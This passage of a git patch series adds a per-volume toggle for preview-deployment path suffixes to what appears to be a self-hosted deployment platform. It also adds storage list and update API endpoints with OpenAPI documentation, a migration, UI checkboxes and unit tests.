             // Sync FROM model (on load/refresh)
             $this->name = $this->storage->name;
             $this->mountPath = $this->storage->mount_path;
             $this->hostPath = $this->storage->host_path;
+            $this->isPreviewSuffixEnabled = $this->storage->is_preview_suffix_enabled ?? true;
         }
     }
 
@@ -67,6 +72,15 @@ public function mount()
         $this->isReadOnly = $this->storage->shouldBeReadOnlyInUI();
     }
 
+    public function instantSave()
+    {
+        $this->authorize('update', $this->resource);
+
+        $this->syncData(true);
+        $this->storage->save();
+        $this->dispatch('success', 'Storage updated successfully');
+    }
+
     public function submit()
     {
         $this->authorize('update', $this->resource);
diff --git a/app/Models/LocalFileVolume.php b/app/Models/LocalFileVolume.php
index 9d7095cb5..da58ed2f9 100644
--- a/app/Models/LocalFileVolume.php
+++ b/app/Models/LocalFileVolume.php
@@ -14,6 +14,7 @@ class LocalFileVolume extends BaseModel
         // 'mount_path' => 'encrypted',
         'content' => 'encrypted',
         'is_directory' => 'boolean',
+        'is_preview_suffix_enabled' => 'boolean',
     ];
 
     use HasFactory;
diff --git a/app/Models/LocalPersistentVolume.php b/app/Models/LocalPersistentVolume.php
index 7126253ea..1721f4afe 100644
--- a/app/Models/LocalPersistentVolume.php
+++ b/app/Models/LocalPersistentVolume.php
@@ -10,6 +10,10 @@ class LocalPersistentVolume extends Model
 {
     protected $guarded = [];
 
+    protected $casts = [
+        'is_preview_suffix_enabled' => 'boolean',
+    ];
+
     public function resource()
     {
         return $this->morphTo('resource');
diff --git a/bootstrap/helpers/parsers.php b/bootstrap/helpers/parsers.php
index 95f5fa9c0..cd4928d63 100644
--- a/bootstrap/helpers/parsers.php
+++ b/bootstrap/helpers/parsers.php
@@ -789,6 +789,12 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
                             $mainDirectory = str(base_configuration_dir().'/applications/'.$uuid);
                         }
                         $source = replaceLocalSource($source, $mainDirectory);
+                        $isPreviewSuffixEnabled = $foundConfig
+                            ? (bool) data_get($foundConfig, 'is_preview_suffix_enabled', true)
+                            : true;
+                        if ($isPullRequest && $isPreviewSuffixEnabled) {
+                            $source = addPreviewDeploymentSuffix($source, $pull_request_id);
+                        }
                         LocalFileVolume::updateOrCreate(
                             [
                                 'mount_path' => $target,
@@ -1312,19 +1318,19 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
         }
         if (! $isDatabase && $fqdns instanceof Collection && $fqdns->count() > 0) {
             $shouldGenerateLabelsExactly = $resource->destination->server->settings->generate_exact_labels;
-            $uuid = $resource->uuid;
-            $network = data_get($resource, 'destination.network');
+            $labelUuid = $resource->uuid;
+            $labelNetwork = data_get($resource, 'destination.network');
             if ($isPullRequest) {
-                $uuid = "{$resource->uuid}-{$pullRequestId}";
+                $labelUuid = "{$resource->uuid}-{$pullRequestId}";
             }
             if ($isPullRequest) {
-                $network = "{$resource->destination->network}-{$pullRequestId}";
+                $labelNetwork = "{$resource->destination->network}-{$pullRequestId}";
             }
             if ($shouldGenerateLabelsExactly) {
                 switch ($server->proxyType()) {
                     case ProxyTypes::TRAEFIK->value:
                         $serviceLabels = $serviceLabels->merge(fqdnLabelsForTraefik(
-                            uuid: $uuid,
+                            uuid: $labelUuid,
                             domains: $fqdns,
                             is_force_https_enabled: $originalResource->isForceHttpsEnabled(),
                             serviceLabels: $serviceLabels,
@@ -1336,8 +1342,8 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
                         break;
                     case ProxyTypes::CADDY->value:
                         $serviceLabels = $serviceLabels->merge(fqdnLabelsForCaddy(
-                            network: $network,
-                            uuid: $uuid,
+                            network: $labelNetwork,
+                            uuid: $labelUuid,
                             domains: $fqdns,
                             is_force_https_enabled: $originalResource->isForceHttpsEnabled(),
                             serviceLabels: $serviceLabels,
@@ -1351,7 +1357,7 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
                 }
             } else {
                 $serviceLabels = $serviceLabels->merge(fqdnLabelsForTraefik(
-                    uuid: $uuid,
+                    uuid: $labelUuid,
                     domains: $fqdns,
                     is_force_https_enabled: $originalResource->isForceHttpsEnabled(),
                     serviceLabels: $serviceLabels,
@@ -1361,8 +1367,8 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
                     image: $image
                 ));
                 $serviceLabels = $serviceLabels->merge(fqdnLabelsForCaddy(
-                    network: $network,
-                    uuid: $uuid,
+                    network: $labelNetwork,
+                    uuid: $labelUuid,
                     domains: $fqdns,
                     is_force_https_enabled: $originalResource->isForceHttpsEnabled(),
                     serviceLabels: $serviceLabels,
diff --git a/database/migrations/2026_03_16_000000_add_is_preview_suffix_enabled_to_volume_tables.php b/database/migrations/2026_03_16_000000_add_is_preview_suffix_enabled_to_volume_tables.php
new file mode 100644
index 000000000..a1f1d9ea1
--- /dev/null
+++ b/database/migrations/2026_03_16_000000_add_is_preview_suffix_enabled_to_volume_tables.php
@@ -0,0 +1,30 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Database\Schema\Blueprint;
+use Illuminate\Support\Facades\Schema;
+
+return new class extends Migration
+{
+    public function up(): void
+    {
+        Schema::table('local_file_volumes', function (Blueprint $table) {
+            $table->boolean('is_preview_suffix_enabled')->default(true)->after('is_based_on_git');
+        });
+
+        Schema::table('local_persistent_volumes', function (Blueprint $table) {
+            $table->boolean('is_preview_suffix_enabled')->default(true)->after('host_path');
+        });
+    }
+
+    public function down(): void
+    {
+        Schema::table('local_file_volumes', function (Blueprint $table) {
+            $table->dropColumn('is_preview_suffix_enabled');
+        });
+
+        Schema::table('local_persistent_volumes', function (Blueprint $table) {
+            $table->dropColumn('is_preview_suffix_enabled');
+        });
+    }
+};
diff --git a/resources/views/livewire/project/service/file-storage.blade.php b/resources/views/livewire/project/service/file-storage.blade.php
index 1dd58fe17..24612098b 100644
--- a/resources/views/livewire/project/service/file-storage.blade.php
+++ b/resources/views/livewire/project/service/file-storage.blade.php
@@ -15,6 +15,13 @@
                 <x-forms.input label="Destination Path" :value="$fileStorage->mount_path" readonly />
             </div>
         </div>
+        @can('update', $resource)
+            <div class="w-96">
+                <x-forms.checkbox instantSave label="Add suffix for PR deployments"
+                    id="isPreviewSuffixEnabled"
+                    helper="When enabled, a -pr-N suffix is added to this volume's path for preview deployments (e.g. ./scripts becomes ./scripts-pr-1). Disable this for volumes that contain shared config or scripts from your repository."></x-forms.checkbox>
+            </div>
+        @endcan
         <form wire:submit='submit' class="flex flex-col gap-2">
             @if (!$isReadOnly)
                 @can('update', $resource)
diff --git a/resources/views/livewire/project/shared/storages/show.blade.php b/resources/views/livewire/project/shared/storages/show.blade.php
index 694f7d4f2..a3a486b92 100644
--- a/resources/views/livewire/project/shared/storages/show.blade.php
+++ b/resources/views/livewire/project/shared/storages/show.blade.php
@@ -38,6 +38,13 @@
                     <x-forms.input id="mountPath" required readonly />
                 </div>
             @endif
+            @can('update', $resource)
+                <div class="w-96">
+                    <x-forms.checkbox instantSave label="Add suffix for PR deployments"
+                        id="isPreviewSuffixEnabled"
+                        helper="When enabled, a -pr-N suffix is added to this volume's name for preview deployments (e.g. myvolume becomes myvolume-pr-1). Disable this for volumes that should be shared between the main and preview deployments."></x-forms.checkbox>
+                </div>
+            @endcan
         @else
             @can('update', $resource)
                 @if ($isFirst)
@@ -54,6 +61,13 @@
                         <x-forms.input id="mountPath" required />
                     </div>
                 @endif
+                @if (data_get($resource, 'settings.is_preview_deployments_enabled'))
+                    <div class="w-96">
+                        <x-forms.checkbox instantSave label="Add suffix for PR deployments"
+                            id="isPreviewSuffixEnabled"
+                            helper="When enabled, a -pr-N suffix is added to this volume's name for preview deployments (e.g. myvolume becomes myvolume-pr-1). Disable this for volumes that should be shared between the main and preview deployments."></x-forms.checkbox>
+                    </div>
+                @endif
                 <div class="flex gap-2">
                     <x-forms.button type="submit">
                         Update
diff --git a/tests/Unit/PreviewDeploymentBindMountTest.php b/tests/Unit/PreviewDeploymentBindMountTest.php
index acc560e68..367770b08 100644
--- a/tests/Unit/PreviewDeploymentBindMountTest.php
+++ b/tests/Unit/PreviewDeploymentBindMountTest.php
@@ -3,12 +3,13 @@
 /**
  * Tests for GitHub issue #7802: volume mappings from repo content in Preview Deployments.
  *
- * Bind mount volumes (e.g., ./scripts:/scripts:ro) should NOT get a -pr-N suffix
- * during preview deployments, because the repo files exist at the original path.
- * Only named Docker volumes need the suffix for isolation between PRs.
+ * Bind mount volumes use a per-volume `is_preview_suffix_enabled` setting to control
+ * whether the -pr-N suffix is applied during preview deployments.
+ * When enabled (default), the suffix is applied for data isolation.
+ * When disabled, the volume path is shared with the main deployment.
+ * Named Docker volumes also respect this setting.
  */
-it('does not apply preview deployment suffix to bind mount source paths', function () {
-    // Read the applicationParser volume handling in parsers.php
+it('uses is_preview_suffix_enabled setting for bind mount suffix in preview deployments', function () {
     $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
 
     // Find the bind mount handling block (type === 'bind')
@@ -16,12 +17,14 @@
     $volumeBlockStart = strpos($parsersFile, "} elseif (\$type->value() === 'volume')");
     $bindBlock = substr($parsersFile, $bindBlockStart, $volumeBlockStart - $bindBlockStart);
 
-    // Bind mount paths should NOT be suffixed with -pr-N
-    expect($bindBlock)->not->toContain('addPreviewDeploymentSuffix');
+    // Bind mount block should check is_preview_suffix_enabled before applying suffix
+    expect($bindBlock)
+        ->toContain('$isPreviewSuffixEnabled')
+        ->toContain('is_preview_suffix_enabled')
+        ->toContain('addPreviewDeploymentSuffix');
 });
 
 it('still applies preview deployment suffix to named volume paths', function () {
-    // Read the applicationParser volume handling in parsers.php
     $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
 
     // Find the named volume handling block (type === 'volume')
@@ -39,3 +42,68 @@
     $result = addPreviewDeploymentSuffix('myvolume', 0);
     expect($result)->toBe('myvolume');
 });
+
+/**
+ * Tests for GitHub issue #7343: $uuid mutation in label generation leaks into
+ * subsequent services' volume paths during preview deployments.
+ *
+ * The label generation block must use a local variable ($labelUuid) instead of
+ * mutating the shared $uuid variable, which is used for volume base paths.
+ */
+it('does not mutate shared uuid variable during label generation', function () {
+    $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+
+    // Find the FQDN label generation block
+    $labelBlockStart = strpos($parsersFile, '$shouldGenerateLabelsExactly = $resource->destination->server->settings->generate_exact_labels;');
+    $labelBlock = substr($parsersFile, $labelBlockStart, 300);
+
+    // Should use $labelUuid, not mutate $uuid
+    expect($labelBlock)
+        ->toContain('$labelUuid = $resource->uuid')
+        ->not->toContain('$uuid = $resource->uuid')
+        ->not->toContain("\$uuid = \"{$resource->uuid}");
+});
+
+it('uses labelUuid in all proxy label generation calls', function () {
+    $parsersFile = file_get_contents(__DIR__.'/../../bootstrap/helpers/parsers.php');
+
+    // Find the FQDN label generation block (from shouldGenerateLabelsExactly to the closing brace)
+    $labelBlockStart = strpos($parsersFile, '$shouldGenerateLabelsExactly');
+    $labelBlockEnd = strpos($parsersFile, "data_forget(\$service, 'volumes.*.content')");
+    $labelBlock = substr($parsersFile, $labelBlockStart, $labelBlockEnd - $labelBlockStart);
+
+    // All uuid references in label functions should use $labelUuid
+    expect($labelBlock)
+        ->toContain('uuid: $labelUuid')
+        ->not->toContain('uuid: $uuid');
+});
+
+it('checks is_preview_suffix_enabled in deployment job for persistent volumes', function () {
+    $deploymentJobFile = file_get_contents(__DIR__.'/../../app/Jobs/ApplicationDeploymentJob.php');
+
+    // Find the generate_local_persistent_volumes method
+    $methodStart = strpos($deploymentJobFile, 'function generate_local_persistent_volumes()');
+    $methodEnd = strpos($deploymentJobFile, 'function generate_local_persistent_volumes_only_volume_names()');
+    $methodBlock = substr($deploymentJobFile, $methodStart, $methodEnd - $methodStart);
+
+    // Should check is_preview_suffix_enabled before applying suffix
+    expect($methodBlock)
+        ->toContain('is_preview_suffix_enabled')
+        ->toContain('$isPreviewSuffixEnabled')
+        ->toContain('addPreviewDeploymentSuffix');
+});
+
+it('checks is_preview_suffix_enabled in deployment job for volume names', function () {
+    $deploymentJobFile = file_get_contents(__DIR__.'/../../app/Jobs/ApplicationDeploymentJob.php');
+
+    // Find the generate_local_persistent_volumes_only_volume_names method
+    $methodStart = strpos($deploymentJobFile, 'function generate_local_persistent_volumes_only_volume_names()');
+    $methodEnd = strpos($deploymentJobFile, 'function generate_healthcheck_commands()');
+    $methodBlock = substr($deploymentJobFile, $methodStart, $methodEnd - $methodStart);
+
+    // Should check is_preview_suffix_enabled before applying suffix
+    expect($methodBlock)
+        ->toContain('is_preview_suffix_enabled')
+        ->toContain('$isPreviewSuffixEnabled')
+        ->toContain('addPreviewDeploymentSuffix');
+});

From c9861e08e359566ef8f97862b65f8d9d8ec77a78 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 15:13:36 +0100
Subject: [PATCH 072/213] fix(preview): sync isPreviewSuffixEnabled property on
 file storage save

---
 app/Livewire/Project/Service/FileStorage.php | 1 +
 1 file changed, 1 insertion(+)

diff --git a/app/Livewire/Project/Service/FileStorage.php b/app/Livewire/Project/Service/FileStorage.php
index 33b32989a..71da07eb0 100644
--- a/app/Livewire/Project/Service/FileStorage.php
+++ b/app/Livewire/Project/Service/FileStorage.php
@@ -181,6 +181,7 @@ public function submit()
             // Sync component properties to model
             $this->fileStorage->content = $this->content;
             $this->fileStorage->is_based_on_git = $this->isBasedOnGit;
+            $this->fileStorage->is_preview_suffix_enabled = $this->isPreviewSuffixEnabled;
             $this->fileStorage->save();
             $this->fileStorage->saveStorageOnServer();
             $this->dispatch('success', 'File updated.');

From 0488a188a0ce6af0a82e933b78c74b08b2254e46 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 15:34:27 +0100
Subject: [PATCH 073/213] feat(api): add storages endpoints for applications

Add GET and PATCH /applications/{uuid}/storages routes to list and
update persistent and file storages for an application, including
support for toggling is_preview_suffix_enabled.
---
 .../Api/ApplicationsController.php            | 187 ++++++++++++++++++
 openapi.json                                  | 111 +++++++++++
 openapi.yaml                                  |  74 +++++++
 routes/api.php                                |   2 +
 4 files changed, 374 insertions(+)

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 4b0cfc6ab..a6609eb47 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -3919,4 +3919,191 @@ private function validateDataApplications(Request $request, Server $server)
             }
         }
     }
+
+    #[OA\Get(
+        summary: 'List Storages',
+        description: 'List all persistent storages and file storages by application UUID.',
+        path: '/applications/{uuid}/storages',
+        operationId: 'list-storages-by-application-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Applications'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the application.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        responses: [
+            new OA\Response(
+                response: 200,
+                description: 'All storages by application UUID.',
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+        ]
+    )]
+    public function storages(Request $request)
+    {
+        $teamId = getTeamIdFromToken();
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->uuid)->first();
+
+        if (! $application) {
+            return response()->json([
+                'message' => 'Application not found',
+            ], 404);
+        }
+
+        $this->authorize('view', $application);
+
+        $persistentStorages = $application->persistentStorages->sortBy('id')->values();
+        $fileStorages = $application->fileStorages->sortBy('id')->values();
+
+        return response()->json([
+            'persistent_storages' => $persistentStorages,
+            'file_storages' => $fileStorages,
+        ]);
+    }
+
+    #[OA\Patch(
+        summary: 'Update Storage',
+        description: 'Update a persistent storage or file storage by application UUID.',
+        path: '/applications/{uuid}/storages',
+        operationId: 'update-storage-by-application-uuid',
+        security: [
+            ['bearerAuth' => []],
+        ],
+        tags: ['Applications'],
+        parameters: [
+            new OA\Parameter(
+                name: 'uuid',
+                in: 'path',
+                description: 'UUID of the application.',
+                required: true,
+                schema: new OA\Schema(
+                    type: 'string',
+                )
+            ),
+        ],
+        requestBody: new OA\RequestBody(
+            description: 'Storage updated.',
+            required: true,
+            content: [
+                new OA\MediaType(
+                    mediaType: 'application/json',
+                    schema: new OA\Schema(
+                        type: 'object',
+                        required: ['id', 'type'],
+                        properties: [
+                            'id' => ['type' => 'integer', 'description' => 'The ID of the storage.'],
+                            'type' => ['type' => 'string', 'enum' => ['persistent', 'file'], 'description' => 'The type of storage: persistent or file.'],
+                            'is_preview_suffix_enabled' => ['type' => 'boolean', 'description' => 'Whether to add -pr-N suffix for preview deployments.'],
+                        ],
+                    ),
+                ),
+            ],
+        ),
+        responses: [
+            new OA\Response(
+                response: 200,
+                description: 'Storage updated.',
+            ),
+            new OA\Response(
+                response: 401,
+                ref: '#/components/responses/401',
+            ),
+            new OA\Response(
+                response: 400,
+                ref: '#/components/responses/400',
+            ),
+            new OA\Response(
+                response: 404,
+                ref: '#/components/responses/404',
+            ),
+        ]
+    )]
+    public function update_storage(Request $request)
+    {
+        $allowedFields = ['id', 'type', 'is_preview_suffix_enabled'];
+        $teamId = getTeamIdFromToken();
+
+        if (is_null($teamId)) {
+            return invalidTokenResponse();
+        }
+
+        $return = validateIncomingRequest($request);
+        if ($return instanceof \Illuminate\Http\JsonResponse) {
+            return $return;
+        }
+
+        $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->uuid)->first();
+
+        if (! $application) {
+            return response()->json([
+                'message' => 'Application not found',
+            ], 404);
+        }
+
+        $this->authorize('update', $application);
+
+        $validator = customApiValidator($request->all(), [
+            'id' => 'required|integer',
+            'type' => 'required|string|in:persistent,file',
+            'is_preview_suffix_enabled' => 'boolean',
+        ]);
+
+        $extraFields = array_diff(array_keys($request->all()), $allowedFields);
+        if ($validator->fails() || ! empty($extraFields)) {
+            $errors = $validator->errors();
+            if (! empty($extraFields)) {
+                foreach ($extraFields as $field) {
+                    $errors->add($field, 'This field is not allowed.');
+                }
+            }
+
+            return response()->json([
+                'message' => 'Validation failed.',
+                'errors' => $errors,
+            ], 422);
+        }
+
+        if ($request->type === 'persistent') {
+            $storage = $application->persistentStorages->where('id', $request->id)->first();
+        } else {
+            $storage = $application->fileStorages->where('id', $request->id)->first();
+        }
+
+        if (! $storage) {
+            return response()->json([
+                'message' => 'Storage not found.',
+            ], 404);
+        }
+
+        if ($request->has('is_preview_suffix_enabled')) {
+            $storage->is_preview_suffix_enabled = $request->is_preview_suffix_enabled;
+        }
+
+        $storage->save();
+
+        return response()->json($storage);
+    }
 }
diff --git a/openapi.json b/openapi.json
index f5d9813b3..13f745e11 100644
--- a/openapi.json
+++ b/openapi.json
@@ -3442,6 +3442,117 @@
                 ]
             }
         },
+        "\/applications\/{uuid}\/storages": {
+            "get": {
+                "tags": [
+                    "Applications"
+                ],
+                "summary": "List Storages",
+                "description": "List all persistent storages and file storages by application UUID.",
+                "operationId": "list-storages-by-application-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the application.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "responses": {
+                    "200": {
+                        "description": "All storages by application UUID."
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            },
+            "patch": {
+                "tags": [
+                    "Applications"
+                ],
+                "summary": "Update Storage",
+                "description": "Update a persistent storage or file storage by application UUID.",
+                "operationId": "update-storage-by-application-uuid",
+                "parameters": [
+                    {
+                        "name": "uuid",
+                        "in": "path",
+                        "description": "UUID of the application.",
+                        "required": true,
+                        "schema": {
+                            "type": "string"
+                        }
+                    }
+                ],
+                "requestBody": {
+                    "description": "Storage updated.",
+                    "required": true,
+                    "content": {
+                        "application\/json": {
+                            "schema": {
+                                "required": [
+                                    "id",
+                                    "type"
+                                ],
+                                "properties": {
+                                    "id": {
+                                        "type": "integer",
+                                        "description": "The ID of the storage."
+                                    },
+                                    "type": {
+                                        "type": "string",
+                                        "enum": [
+                                            "persistent",
+                                            "file"
+                                        ],
+                                        "description": "The type of storage: persistent or file."
+                                    },
+                                    "is_preview_suffix_enabled": {
+                                        "type": "boolean",
+                                        "description": "Whether to add -pr-N suffix for preview deployments."
+                                    }
+                                },
+                                "type": "object"
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "200": {
+                        "description": "Storage updated."
+                    },
+                    "401": {
+                        "$ref": "#\/components\/responses\/401"
+                    },
+                    "400": {
+                        "$ref": "#\/components\/responses\/400"
+                    },
+                    "404": {
+                        "$ref": "#\/components\/responses\/404"
+                    }
+                },
+                "security": [
+                    {
+                        "bearerAuth": []
+                    }
+                ]
+            }
+        },
         "\/cloud-tokens": {
             "get": {
                 "tags": [
diff --git a/openapi.yaml b/openapi.yaml
index 81753544f..7ee406c99 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2170,6 +2170,80 @@ paths:
       security:
         -
           bearerAuth: []
+  '/applications/{uuid}/storages':
+    get:
+      tags:
+        - Applications
+      summary: 'List Storages'
+      description: 'List all persistent storages and file storages by application UUID.'
+      operationId: list-storages-by-application-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the application.'
+          required: true
+          schema:
+            type: string
+      responses:
+        '200':
+          description: 'All storages by application UUID.'
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+      security:
+        -
+          bearerAuth: []
+    patch:
+      tags:
+        - Applications
+      summary: 'Update Storage'
+      description: 'Update a persistent storage or file storage by application UUID.'
+      operationId: update-storage-by-application-uuid
+      parameters:
+        -
+          name: uuid
+          in: path
+          description: 'UUID of the application.'
+          required: true
+          schema:
+            type: string
+      requestBody:
+        description: 'Storage updated.'
+        required: true
+        content:
+          application/json:
+            schema:
+              required:
+                - id
+                - type
+              properties:
+                id:
+                  type: integer
+                  description: 'The ID of the storage.'
+                type:
+                  type: string
+                  enum: [persistent, file]
+                  description: 'The type of storage: persistent or file.'
+                is_preview_suffix_enabled:
+                  type: boolean
+                  description: 'Whether to add -pr-N suffix for preview deployments.'
+              type: object
+      responses:
+        '200':
+          description: 'Storage updated.'
+        '401':
+          $ref: '#/components/responses/401'
+        '400':
+          $ref: '#/components/responses/400'
+        '404':
+          $ref: '#/components/responses/404'
+      security:
+        -
+          bearerAuth: []
   /cloud-tokens:
     get:
       tags:
diff --git a/routes/api.php b/routes/api.php
index 8b28177f3..b02682a5b 100644
--- a/routes/api.php
+++ b/routes/api.php
@@ -120,6 +120,8 @@
     Route::patch('/applications/{uuid}/envs', [ApplicationsController::class, 'update_env_by_uuid'])->middleware(['api.ability:write']);
     Route::delete('/applications/{uuid}/envs/{env_uuid}', [ApplicationsController::class, 'delete_env_by_uuid'])->middleware(['api.ability:write']);
     Route::get('/applications/{uuid}/logs', [ApplicationsController::class, 'logs_by_uuid'])->middleware(['api.ability:read']);
+    Route::get('/applications/{uuid}/storages', [ApplicationsController::class, 'storages'])->middleware(['api.ability:read']);
+    Route::patch('/applications/{uuid}/storages', [ApplicationsController::class, 'update_storage'])->middleware(['api.ability:write']);
 
     Route::match(['get', 'post'], '/applications/{uuid}/start', [ApplicationsController::class, 'action_deploy'])->middleware(['api.ability:deploy']);
     Route::match(['get', 'post'], '/applications/{uuid}/restart', [ApplicationsController::class, 'action_restart'])->middleware(['api.ability:deploy']);

From 9d745fca75098d76f2ab69ef8049a8d476fe9fc0 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 15:37:46 +0100
Subject: [PATCH 074/213] feat(api): expand update_storage to support name,
 mount_path, host_path, content fields

Add support for updating additional storage fields via the API while
enforcing read-only restrictions for storages managed by docker-compose
or service definitions (only is_preview_suffix_enabled remains editable
for those).
---
 .../Api/ApplicationsController.php            | 48 +++++++++++++++++--
 openapi.json                                  | 20 +++++++-
 openapi.yaml                                  | 16 ++++++-
 3 files changed, 79 insertions(+), 5 deletions(-)

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index a6609eb47..6521ef7ba 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -4005,7 +4005,7 @@ public function storages(Request $request)
             ),
         ],
         requestBody: new OA\RequestBody(
-            description: 'Storage updated.',
+            description: 'Storage updated. For read-only storages (from docker-compose or services), only is_preview_suffix_enabled can be updated.',
             required: true,
             content: [
                 new OA\MediaType(
@@ -4017,6 +4017,10 @@ public function storages(Request $request)
                             'id' => ['type' => 'integer', 'description' => 'The ID of the storage.'],
                             'type' => ['type' => 'string', 'enum' => ['persistent', 'file'], 'description' => 'The type of storage: persistent or file.'],
                             'is_preview_suffix_enabled' => ['type' => 'boolean', 'description' => 'Whether to add -pr-N suffix for preview deployments.'],
+                            'name' => ['type' => 'string', 'description' => 'The volume name (persistent only, not allowed for read-only storages).'],
+                            'mount_path' => ['type' => 'string', 'description' => 'The container mount path (not allowed for read-only storages).'],
+                            'host_path' => ['type' => 'string', 'nullable' => true, 'description' => 'The host path (persistent only, not allowed for read-only storages).'],
+                            'content' => ['type' => 'string', 'nullable' => true, 'description' => 'The file content (file only, not allowed for read-only storages).'],
                         ],
                     ),
                 ),
@@ -4043,7 +4047,6 @@ public function storages(Request $request)
     )]
     public function update_storage(Request $request)
     {
-        $allowedFields = ['id', 'type', 'is_preview_suffix_enabled'];
         $teamId = getTeamIdFromToken();
 
         if (is_null($teamId)) {
@@ -4069,9 +4072,14 @@ public function update_storage(Request $request)
             'id' => 'required|integer',
             'type' => 'required|string|in:persistent,file',
             'is_preview_suffix_enabled' => 'boolean',
+            'name' => 'string',
+            'mount_path' => 'string',
+            'host_path' => 'string|nullable',
+            'content' => 'string|nullable',
         ]);
 
-        $extraFields = array_diff(array_keys($request->all()), $allowedFields);
+        $allAllowedFields = ['id', 'type', 'is_preview_suffix_enabled', 'name', 'mount_path', 'host_path', 'content'];
+        $extraFields = array_diff(array_keys($request->all()), $allAllowedFields);
         if ($validator->fails() || ! empty($extraFields)) {
             $errors = $validator->errors();
             if (! empty($extraFields)) {
@@ -4098,10 +4106,44 @@ public function update_storage(Request $request)
             ], 404);
         }
 
+        $isReadOnly = $storage->shouldBeReadOnlyInUI();
+        $editableOnlyFields = ['name', 'mount_path', 'host_path', 'content'];
+        $requestedEditableFields = array_intersect($editableOnlyFields, array_keys($request->all()));
+
+        if ($isReadOnly && ! empty($requestedEditableFields)) {
+            return response()->json([
+                'message' => 'This storage is read-only (managed by docker-compose or service definition). Only is_preview_suffix_enabled can be updated.',
+                'read_only_fields' => array_values($requestedEditableFields),
+            ], 422);
+        }
+
+        // Always allowed
         if ($request->has('is_preview_suffix_enabled')) {
             $storage->is_preview_suffix_enabled = $request->is_preview_suffix_enabled;
         }
 
+        // Only for editable storages
+        if (! $isReadOnly) {
+            if ($request->type === 'persistent') {
+                if ($request->has('name')) {
+                    $storage->name = $request->name;
+                }
+                if ($request->has('mount_path')) {
+                    $storage->mount_path = $request->mount_path;
+                }
+                if ($request->has('host_path')) {
+                    $storage->host_path = $request->host_path;
+                }
+            } else {
+                if ($request->has('mount_path')) {
+                    $storage->mount_path = $request->mount_path;
+                }
+                if ($request->has('content')) {
+                    $storage->content = $request->content;
+                }
+            }
+        }
+
         $storage->save();
 
         return response()->json($storage);
diff --git a/openapi.json b/openapi.json
index 13f745e11..d1dadcaf0 100644
--- a/openapi.json
+++ b/openapi.json
@@ -3500,7 +3500,7 @@
                     }
                 ],
                 "requestBody": {
-                    "description": "Storage updated.",
+                    "description": "Storage updated. For read-only storages (from docker-compose or services), only is_preview_suffix_enabled can be updated.",
                     "required": true,
                     "content": {
                         "application\/json": {
@@ -3525,6 +3525,24 @@
                                     "is_preview_suffix_enabled": {
                                         "type": "boolean",
                                         "description": "Whether to add -pr-N suffix for preview deployments."
+                                    },
+                                    "name": {
+                                        "type": "string",
+                                        "description": "The volume name (persistent only, not allowed for read-only storages)."
+                                    },
+                                    "mount_path": {
+                                        "type": "string",
+                                        "description": "The container mount path (not allowed for read-only storages)."
+                                    },
+                                    "host_path": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "The host path (persistent only, not allowed for read-only storages)."
+                                    },
+                                    "content": {
+                                        "type": "string",
+                                        "nullable": true,
+                                        "description": "The file content (file only, not allowed for read-only storages)."
                                     }
                                 },
                                 "type": "object"
diff --git a/openapi.yaml b/openapi.yaml
index 7ee406c99..74af3aa13 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2212,7 +2212,7 @@ paths:
           schema:
             type: string
       requestBody:
-        description: 'Storage updated.'
+        description: 'Storage updated. For read-only storages (from docker-compose or services), only is_preview_suffix_enabled can be updated.'
         required: true
         content:
           application/json:
@@ -2231,6 +2231,20 @@ paths:
                 is_preview_suffix_enabled:
                   type: boolean
                   description: 'Whether to add -pr-N suffix for preview deployments.'
+                name:
+                  type: string
+                  description: 'The volume name (persistent only, not allowed for read-only storages).'
+                mount_path:
+                  type: string
